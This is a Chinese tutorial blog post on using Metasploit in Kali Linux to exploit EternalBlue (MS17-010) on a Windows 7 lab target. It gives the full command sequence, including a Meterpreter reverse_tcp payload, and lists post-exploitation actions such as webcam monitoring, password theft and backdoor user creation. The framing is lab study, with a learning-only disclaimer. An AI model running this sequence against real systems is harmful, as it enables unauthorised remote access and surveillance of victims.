在Kali操作系统上使用metasploit

这篇具有很好参考价值的文章主要介绍了在Kali操作系统上使用metasploit。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

目录

<一>:metasploit 简述

<二>:msf 使用法则

<三>:启动 metasploit 前需要做的事项

<四>:metasploit 攻击 windows 系统

         metasploit 攻击 eternalblue(永恒之蓝)全流程:

                (1):使用模块

                (2):配置模块必选项

​               (3):运行模块

              (4):设置必选项(补充)

<五>:meterpreter 攻击成功后能做什么



<一>:metasploit 简述

                metasploit 简称 msf,是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的 shellcode,并持续保持更新。

<二>:msf 使用法则

                使用模块 ->配置模块必选项->运行模块

<三>:启动 metasploit 前需要做的事项

                ①:打开Kali终端

                ②:使用sudo su 命令,并输入 Kali 的密码,切换至root用户

                ③:使用 msfdb init 命令初始化 metasploit 数据库(*可选)

在Kali操作系统上使用metasploit

<四>:metasploit 攻击 windows 系统

                msfconsole:启动 metasploit 命令行 (命令行效率高,方便使用)

在Kali操作系统上使用metasploit

         metasploit 攻击 eternalblue(永恒之蓝)全流程:

                (1):使用模块

                               ①:搜索微软给永恒之蓝的漏洞号:search ms17_010

                               ②: 使用此漏洞:use exploit/windows/smb/ms17_010_eternalblue

在Kali操作系统上使用metasploit

                (2):配置模块必选项

                                查看必选项[*required 为 yes 的就是必选项]

                                        ①:show options (查看设置)

在Kali操作系统上使用metasploit

在Kali操作系统上使用metasploit                 (3):运行模块

                                   以虚拟机上的xin7操作系统为靶机为例 (先同时按win+R,然后输入cmd,回车,最后输入ipconfig,查看被攻击的靶机IP地址)

在Kali操作系统上使用metasploit

                                        ①:set RHosts 被攻击的IP地址

                                        ②:show options (查看是否还有必选项需要修改)

                                        ③:set LPORT 0~65536 (为了防止攻击失败多设置一个)

                                        ④:run (攻击操作系统,并获取命令运行最低权限)

在Kali操作系统上使用metasploit

 在Kali操作系统上使用metasploit

在Kali操作系统上使用metasploit

(注:显示攻击失败表示目标主机上没有此漏洞,此漏洞只适用于攻击自己的win7靶机,高版本的系统已经修复此漏洞,显示WIN 表示攻击成功,其他则是失败)

              (4):设置必选项(补充)

                                   ①: set RHosts 被攻击的IP地址

                                        [*RHOSTS 为 target host(s)代表要攻击谁]

                                   ②: set Payload windows/x64/meterpreter/reverse_tcp

                                         [*Payload 是攻击载荷,就是攻击完成后想获取的东西,这里是想获取 meterpreter]

                                        [*meterpreter 是metasploit 后渗透的神器 ]

在Kali操作系统上使用metasploit

                                 ③:set LHOST 攻击的IP地址

                                        [*LHOST 为 listen host 代表你是谁]

                                ④:set LPORT 攻击方使用的监听端口

                                        [* LPORT 为 listen port 代表要在攻击方上开启的端口,1~65535随便选,但不能被占用]

                    (5):meterpreter 后输入 help,可显示攻击成功后可用的权限

<五>:meterpreter 攻击成功后能做什么

                meterpreter 是强大的后渗透模块,可以输入help 查看帮助信息,远程控制、命令执行、摄像头监控、密码获取、创建后门用户、破坏篡改系统.......这些看起来非常复杂又高级的操作都能用meterpreter 中的一行或几个字母,简单的命令完成。

(注:此文章及操作流程只限于学习交流,请勿进行非法操作,做遵纪守法公民)文章来源地址https://www.toymoban.com/news/detail-477117.html

到了这里,关于在Kali操作系统上使用metasploit的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • Kali-linux破解操作系统用户密码

    当忘记操作系统的密码或者攻击某台主机时,需要知道该系统中某个用户的用户名和密码。本节将分别介绍破解Windows和Linux用户密码。 8.6.1 破解Windows用户密码 Windows系统的用户名和密码保存在SAM(安全账号管理器)文件中。在基于NT内核的Windows系统中,包括Windows 2000及后续版

    2024年02月08日
    浏览(35)
  • 第2节 Kali Linux系统初体验及简单操作

    开启kali虚拟机系统后,右键桌面,进入进入终端。 打开后,终端显示内容为: (kali㉿kali)-[~/桌面] ,其中,第一个kali表示现在登录的用户名,第二个kali表示主机名,后面中括号内为当前路径,在下一行开头显示$符号,表示当前用户为一般用户。 切换用户至超级管理员。输

    2024年02月09日
    浏览(27)
  • (已完结)深入浅出操作系统 - 目录

    ---- 整理自狄泰软件唐佐林老师课程 实验环境: OS Version: Ubuntu 10.10 QT Version: 4.7.4 QT Creator Version: 2.4.1 Bochs Version: 2.4.5 01 - 进阶操作系统(BIOS) 02 - Hello, DTOS!(第一个主引导程序,屏幕上打印Hello,DTOS! ) 03 - 调试环境的搭建(Bochs) 04-05 - 主引导程序的扩展 06-07-08 - 突破512字节

    2024年02月12日
    浏览(46)
  • 广工操作系统课设--多用户多级目录的文件系统

    一、课程设计的内容 本课程设计要求设计一个模拟的多用户多级目录的文件系统。通过具体的文件存储空间的管理、文件的物理结构、目录结构和文件操作的实现,加深对文件系统内部功能和实现过程的理解。 二、课程设计的要求与数据 1. 在内存中开辟一个虚拟磁盘空间

    2024年02月12日
    浏览(31)
  • 【Windows系统编程】01.文件与目录操作-笔记

    本专栏从这篇文章开始做Windows系统编程的笔记,本章主要讲解:Windows文件操作(读写文件,删除文件,拷贝文件,移动文件等),目录操作(遍历目录,删除目录等)硬盘的一点小知识。 参考书:Windows核心编程 上述的是没有错误的操作流程 如果文件已经存在的话,就会出

    2024年02月13日
    浏览(33)
  • Linux操作系统设置图形化界面及目录和文件管理常用命令

    目录 1.安装图形化界面  2.开机启动图形化界面 dos界面与图形化界面切换快捷键 3.Windows与Linux文件系统的差别  4.Linux文件系统常用命令  5.使用pwd命令显示工作目录路径 6.绝对路径和相对路径  7.使用ls命令列出目录和文件信息 Linux默认情况下是不会安装图形界面的,所以需要

    2024年02月05日
    浏览(46)
  • 实验6-cp –r系统命令的实现--源路径(目录)中的所有文件和子目录,以及子目录中的所有内容,全部拷贝到目标路径(目录)中--操作系统实验

    掌握Linux目录操作方法,包括打开目录、关闭目录、读取目录文件 掌握Linux文件属性获取方法,包括三个获取Linux文件属性的函数、文件属性解析相关的宏 掌握POSIX与ANSI C文件I/O操作方法,包括打开文件、关闭文件、创建文件、读写文件、定位文件 利用POSIX API(文件操作也可

    2024年02月08日
    浏览(46)
  • 银河麒麟服务器ZYJ操作系统,文件储存inode节点占用根目录/空间满了解决办法

    今天发现业务系统运转异常,df -h 检查服务器发现磁盘根目录空间未满,df -i 检查发现根目录文件满了。inode节点中,记录了文件的类型、大小、权限、所有者、文件连接的数目、创建时间与更新时间等重要的信息,还有一个比较重要的内容就是指向数据块的指针。 根目录

    2024年02月09日
    浏览(77)
  • kali metasploit 信息收集

    1.msf nmao扫描 nmap -v -sV 192.168.111.128 扫描我内网里一台win10主机 2.msf模块 search portscan 搜索portscan模块 SYN半连接扫描 SYN扫描是恶意黑客不建立完全连接,用来判断通信端口状态的一种手段。这种方法是最老的一种攻击手段,有时用来进行拒绝服务攻击。 SYN扫描也称半开放扫描。

    2023年04月15日
    浏览(27)
  • Kali最强渗透工具- metasploit

    数据来源   本文仅用于信息安全学习,请遵守相关法律法规,严禁用于非法途径。若观众因此作出任何危害网络安全的行为,后果自负,与本人无关。  得到ip地址我们能干嘛?         首先进行端口扫描 为什么要进行端口扫描?         端口扫描的作用就是发现目

    2023年04月16日
    浏览(32)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包